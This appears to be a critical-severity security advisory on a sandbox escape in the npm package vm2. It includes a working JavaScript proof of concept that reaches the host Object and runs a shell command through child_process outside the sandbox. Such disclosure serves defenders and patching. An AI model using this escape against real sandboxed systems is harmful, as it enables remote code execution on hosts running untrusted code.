CRITICAL 10.0 npm
vm2 Access to Host Object Enables Sandbox Escape
GHSA-47x8-96vw-5wg6 · CVE-2026-43997
Description
Summary
It is possible to obtain the host Object from inside the sandbox. Commit https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
Details
There are various ways to use the host Object to escape the sandbox; one example is using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom).
PoC
```javascript
// Reach the host realm's Object constructor through Function.prototype.apply and __lookupGetter__
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
// The host Object.getOwnPropertySymbols exposes Symbol(nodejs.util.inspect.custom)
const sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
  [sym]: (depth, opt, inspect) => {
    inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
  },
  valueOf: undefined,
  constructor: undefined,
};
// Host-side inspection of obj invokes the custom inspect function outside the sandbox
WebAssembly.compileStreaming(obj).catch(() => {});
```
Impact
Sandbox Escape -> RCE